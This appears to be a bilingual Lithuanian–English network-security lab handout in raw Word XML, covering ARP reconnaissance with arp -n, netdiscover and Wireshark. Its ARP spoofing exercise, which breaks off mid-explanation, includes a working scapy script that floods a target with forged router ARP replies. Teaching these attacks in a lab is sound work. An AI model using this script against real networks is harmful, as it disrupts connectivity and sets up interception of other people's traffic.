      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC95906" w14:textId="4CE08D0D" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00B60E1C" w:rsidP="00123800">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>In both machines, type “ifconfig” and press ENTER. If your “inet” address starts with 10.0.2..., it means that the virtual network of both machines has been configured correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255BCA80" w14:textId="4471C88D" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00B60E1C" w:rsidP="00123800"/>
    <w:p w14:paraId="5C27A53C" w14:textId="77777777" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00B60E1C">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A1636" w14:textId="3966174F" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00B60E1C" w:rsidP="00B60E1C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>Užduotis Nr. 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366DBE08" w14:textId="5923BB17" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00995B54" w:rsidP="00995B54">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>ARP protokolas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(ARP protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFD437E" w14:textId="77777777" w:rsidR="00995B54" w:rsidRPr="00352171" w:rsidRDefault="00995B54" w:rsidP="00995B54"/>
    <w:p w14:paraId="4DE92C47" w14:textId="6A8139C6" w:rsidR="00995B54" w:rsidRPr="00352171" w:rsidRDefault="00995B54" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B82D415" w14:textId="156543FC" w:rsidR="00995B54" w:rsidRPr="00352171" w:rsidRDefault="00995B54" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>Kas tai yra?</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>Trumpai aptarinat, kiekvienas įrenginys turi du adresus. Tai MAC adresas ir IP adresas. MAC adresas – unikalus gamyklinis kiekvieno įrenginio adresas. IP adresas – routerio priskirtas adresas DHCP serverio, kuris priskyrė adresą patikrinęs ar jis nėra užimtas. Adresas, kuris baigiasi xxx.xxx.xxx.1 bus visada užimtas, nes tai yra pačio tinklo adresas. Kadangi žinome, jog tinklo komunikacijai reikia dviejų adresų (IP, MAC), tai ARP protokolas bando išsiaiškinti, kuris IP adresas priklauso, kuriam MAC adresui juos sujungiant ir išsaugojant savo atmintyje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5903B290" w14:textId="0CCAD04C" w:rsidR="00995B54" w:rsidRPr="00352171" w:rsidRDefault="00995B54" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C360918" w14:textId="7F713694" w:rsidR="00995B54" w:rsidRPr="00352171" w:rsidRDefault="00995B54" w:rsidP="00995B54">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Every device has two addresses — a MAC address and an IP address. A MAC address is the unique factory-assigned hardware address of a device. An IP address is assigned by the router’s DHCP server, which gives an address after checking it isn’t already in use. An address that ends with xxx.xxx.xxx.1 will always be taken, because it belongs to the network itself. Since we know that network communication needs two addresses (IP and MAC), the ARP protocol attempts to discover which IP corresponds to which MAC, linking them together and storing the result in its table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3638E6D6" w14:textId="17F0175B" w:rsidR="00995B54" w:rsidRPr="00352171" w:rsidRDefault="009F4346" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70BCB846" wp14:editId="6ACBCD63">
            <wp:extent cx="6645910" cy="1288415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1638557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7477" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1288415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F55186" w14:textId="00388E95" w:rsidR="009F4346" w:rsidRPr="00352171" w:rsidRDefault="009F4346" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9DA40B" w14:textId="56DD142B" w:rsidR="009F4346" w:rsidRPr="00352171" w:rsidRDefault="009F4346" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>Kali mašinos terminale įvedus: „Arp -n“ galite peržiūrėti kiekvieno įrenginio ARP lenteles. ARP protokolas yra naudojamas tinklo žvalgyboje, kad sužinoti, kurie įrenginiai yra tinkle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08174EED" w14:textId="03B6AD28" w:rsidR="009F4346" w:rsidRPr="00352171" w:rsidRDefault="009F4346" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15085F45" w14:textId="6C2D9FD5" w:rsidR="009F4346" w:rsidRPr="00352171" w:rsidRDefault="009F4346" w:rsidP="00995B54">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>In the Kali machine’s terminal, running arp -n lets you view each device’s ARP table. The ARP protocol is used in network reconnaissance to find out which devices are on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3194E2E2" w14:textId="3351FD76" w:rsidR="009F4346" w:rsidRPr="00352171" w:rsidRDefault="009F4346" w:rsidP="00995B54"/>
    <w:p w14:paraId="6B755D53" w14:textId="77777777" w:rsidR="009F4346" w:rsidRPr="00352171" w:rsidRDefault="009F4346">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2286B621" w14:textId="7162CD86" w:rsidR="009F4346" w:rsidRPr="00352171" w:rsidRDefault="009F4346" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76737EE5" wp14:editId="3F6E049A">
            <wp:extent cx="5590839" cy="3727048"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1984886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6660" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5595961" cy="3730462"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FCB8B5" w14:textId="011FF4B1" w:rsidR="00056F63" w:rsidRPr="00352171" w:rsidRDefault="00056F63" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41FAE292" wp14:editId="71BF7158">
            <wp:extent cx="6645910" cy="1667510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="2837538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3862" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1667510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5F201" w14:textId="4221B76D" w:rsidR="009F4346" w:rsidRPr="00352171" w:rsidRDefault="009F4346" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445DD47B" w14:textId="1176C23D" w:rsidR="009F4346" w:rsidRPr="00352171" w:rsidRDefault="009F4346" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>**Žvalgyba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF936CB" w14:textId="1E825689" w:rsidR="00056F63" w:rsidRPr="00352171" w:rsidRDefault="009F4346" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>Prieš įvedant komandas, atsidarykite Wireshark programą, kurią galite rasti Kali mašinos paieškos lauke. Atidarykite „eth0“. Grįžkite atgal į „Terminal“ ir įveskite „netdiscover -r 10.0.2.0/24“</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* netdiscover – įrankio pavadinimas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t xml:space="preserve">* -r </w:t>
      </w:r>
      <w:r w:rsidR="00056F63" w:rsidRPr="00352171">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00056F63" w:rsidRPr="00352171">
        <w:t>diapozonas</w:t>
      </w:r>
      <w:r w:rsidR="00056F63" w:rsidRPr="00352171">
        <w:br/>
        <w:t>* 10.0.2.0/24 – skanuos adresus nuo 10.0.2.1 iki 10.0.2.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F451F" w14:textId="1785BE0B" w:rsidR="00056F63" w:rsidRPr="00352171" w:rsidRDefault="00056F63" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA9057F" w14:textId="77777777" w:rsidR="00056F63" w:rsidRPr="00352171" w:rsidRDefault="00056F63" w:rsidP="00056F63">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Before entering any commands, open </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> from the Kali machine’s search bar and start a capture on </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B528E" w14:textId="77777777" w:rsidR="00056F63" w:rsidRPr="00352171" w:rsidRDefault="00056F63" w:rsidP="00056F63">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Go back to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> and enter netdiscover -r 10.0.2.0/24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AD760D" w14:textId="7CF74FA3" w:rsidR="00056F63" w:rsidRPr="00352171" w:rsidRDefault="00056F63" w:rsidP="00056F63">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>* netdiscover – the tool name</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* -r – the range option</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* 10.0.2.0/24 – scans addresses from 10.0.2.1 to 10.0.2.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD0BF7C" w14:textId="77777777" w:rsidR="00CA2D6C" w:rsidRPr="00352171" w:rsidRDefault="00CA2D6C" w:rsidP="00056F63"/>
    <w:p w14:paraId="25D87B1A" w14:textId="6B649FEE" w:rsidR="00056F63" w:rsidRPr="00352171" w:rsidRDefault="00CA2D6C" w:rsidP="00056F63">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27743AEB" wp14:editId="7EBC160F">
            <wp:extent cx="6645910" cy="1953895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="191521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6878" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1953895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43708A0A" w14:textId="3F72C991" w:rsidR="00056F63" w:rsidRPr="00352171" w:rsidRDefault="00056F63" w:rsidP="00056F63">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBD7914" w14:textId="5CB50A95" w:rsidR="00056F63" w:rsidRPr="00352171" w:rsidRDefault="00056F63" w:rsidP="00056F63">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Grįžtate į „Wireshark“ programą ir kaip matote, turime skenavimo rezultatą. ARP protokolas siunčia „Broadcast“ žinutę </w:t>
      </w:r>
      <w:r w:rsidR="00CA2D6C" w:rsidRPr="00352171">
        <w:t>visiem įrenginiam, klausdamas kas turi tam tikrą adresą. Įrenginys, kurio adresas atitinka, atsako atgal. Atsakyme randame tiek IP, tiek MAC adresus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4629F2" w14:textId="2B39324B" w:rsidR="00CA2D6C" w:rsidRPr="00352171" w:rsidRDefault="00CA2D6C" w:rsidP="00056F63">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5463D352" w14:textId="2AE329D9" w:rsidR="00CA2D6C" w:rsidRPr="00352171" w:rsidRDefault="00CA2D6C" w:rsidP="00CA2D6C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Go back to Wireshark, and as you can see, we now have the scan results. The ARP protocol sends a Broadcast message to all devices on the network, asking which one owns a specific address. The device whose address matches responds back. In the reply, we can see both the IP and MAC addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74915C38" w14:textId="2CF691A4" w:rsidR="00CA2D6C" w:rsidRPr="00352171" w:rsidRDefault="00CA2D6C" w:rsidP="00CA2D6C"/>
    <w:p w14:paraId="0A3E0AFC" w14:textId="77777777" w:rsidR="00CA2D6C" w:rsidRPr="00352171" w:rsidRDefault="00CA2D6C">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="561B6DC0" w14:textId="25133DC9" w:rsidR="00CA2D6C" w:rsidRPr="00352171" w:rsidRDefault="00CA2D6C" w:rsidP="00CA2D6C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>Užduotis Nr. 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A24DAD8" w14:textId="797C9AE3" w:rsidR="00CA2D6C" w:rsidRPr="00352171" w:rsidRDefault="00CA2D6C" w:rsidP="00CA2D6C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>ARP klastojimas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(ARP spoofing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22579B0F" w14:textId="73A4EB9F" w:rsidR="00613592" w:rsidRPr="00352171" w:rsidRDefault="00613592" w:rsidP="00613592"/>
    <w:p w14:paraId="528C77B8" w14:textId="32A5ED4D" w:rsidR="00613592" w:rsidRPr="00352171" w:rsidRDefault="00613592" w:rsidP="00613592">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D905FB8" w14:textId="3E08061C" w:rsidR="00613592" w:rsidRPr="00352171" w:rsidRDefault="00613592" w:rsidP="00613592">
      <w:r w:rsidRPr="00352171">
        <w:t>Kas tai?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104EB2F5" w14:textId="74E27A10" w:rsidR="00613592" w:rsidRPr="00352171" w:rsidRDefault="00613592" w:rsidP="00613592">
      <w:r w:rsidRPr="00352171">
        <w:t>Tai atakos tipas, kuomet užpuolikas (Kali) siunčia paketus į pasirinktą įrenginį nurodydamas IP adresą routerio, o MAC adresą suklastotą. MAC adresas gali būti bet koks ARP klastojimo scenarijuje. Jei tai bus užpuoliko, tuomet turėsim jau „Man In The Middle“ atakos pradžią, kurią apžvelgsime kitoje užduotyje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2401B612" w14:textId="4617A35C" w:rsidR="00613592" w:rsidRPr="00352171" w:rsidRDefault="00613592" w:rsidP="00613592">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F74BE2D" w14:textId="38ACEEF5" w:rsidR="00613592" w:rsidRPr="00352171" w:rsidRDefault="00613592" w:rsidP="00613592">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>It's a type of attack where an attacker (Kali) sends packets to a chosen device, claiming to be the router by using the router's IP address but a spoofed MAC address. The MAC address can be any value in an ARP spoofing scenario. If that MAC belongs to the attacker, this marks the start of a Man-in-the-Middle attack, which we will examine in another exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB0DDD" w14:textId="77777777" w:rsidR="00613592" w:rsidRPr="00352171" w:rsidRDefault="00613592" w:rsidP="00613592"/>
    <w:p w14:paraId="2A1DC5EB" w14:textId="6310C652" w:rsidR="00613592" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="00613592">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15951886" wp14:editId="43504F3A">
            <wp:extent cx="3562847" cy="762106"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14248318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31833" name="Picture 1" descr="A black background with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3562847" cy="762106"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="378CE016" w14:textId="38C599B9" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="00613592">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FA71E3C" wp14:editId="378FAA9F">
            <wp:extent cx="3801005" cy="743054"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="167067618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76187" name="Picture 1" descr="A black background with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3801005" cy="743054"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D25BE8" w14:textId="772D6686" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="00613592"/>
    <w:p w14:paraId="46B86952" w14:textId="15611541" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="00613592">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48790CEB" wp14:editId="586D317A">
            <wp:extent cx="6106377" cy="2124371"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="1119860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60484" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6106377" cy="2124371"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8CF07" w14:textId="46DFB1CA" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="00613592"/>
    <w:p w14:paraId="39F38087" w14:textId="10B84658" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="00613592">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="029D83FD" wp14:editId="0A36BC9B">
            <wp:extent cx="6645910" cy="2372995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="87365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5654" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2372995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="237323F1" w14:textId="77777777" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="00613592"/>
    <w:p w14:paraId="30718AAB" w14:textId="2B94B28F" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="00613592">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263170BF" w14:textId="3852338A" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Šiai atakai naudosime python įrankį „scapy“ (tinklo paketų kūrimo biblioteka). Terminale rašome „cd /home/kali/Documents/“ ir tada „touch arp_spoofing.py“. </w:t>
      </w:r>
      <w:r w:rsidR="00AA240E" w:rsidRPr="00352171">
        <w:t>Tada rašome „nano arp_spoofing.py“ ir rašome kodą pagal savo atvejį. Tam, kad išeiti, viską išsaugom (CTRL + S) ir išeinam su (CTRL + X)</w:t>
      </w:r>
      <w:r w:rsidR="003E24FF" w:rsidRPr="00352171">
        <w:t>. Atkreipkite dėmesį, jog „loop = 1“ reiškia, kad kodas veiks be sustojimo, tam kad jį nutraukti, naudojam (CTRL + C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06022631" w14:textId="2CD29882" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>***</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7FE438" w14:textId="77777777" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="008647F4"/>
    <w:p w14:paraId="1462F796" w14:textId="77777777" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:t>ether = Ether(src="55:44:55:44:55:44", dst="08:00:27:37:4e:f3")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0F4A8" w14:textId="77777777" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="008647F4"/>
    <w:p w14:paraId="0C76AF98" w14:textId="77777777" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:t>arp = ARP(op=2, psrc="10.0.2.1", hwsrc="55:44:55:44:55:44", pdst="10.0.2.4", hwdst="08:00:27:37:4e:f3")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC6814" w14:textId="77777777" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="008647F4"/>
    <w:p w14:paraId="639186BA" w14:textId="77777777" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:t>frame=ether/arp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ABEB8E" w14:textId="20706090" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:t>sendp(frame, loop=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D83918" w14:textId="77777777" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ECEF6A" w14:textId="51842682" w:rsidR="008647F4" w:rsidRPr="00352171" w:rsidRDefault="008647F4" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:t>* src – Suklastotas MAC adresas</w:t>
      </w:r>
      <w:r w:rsidR="00AA240E" w:rsidRPr="00352171">
        <w:t>. Mano atveju: 55:44:55:44:55:44</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
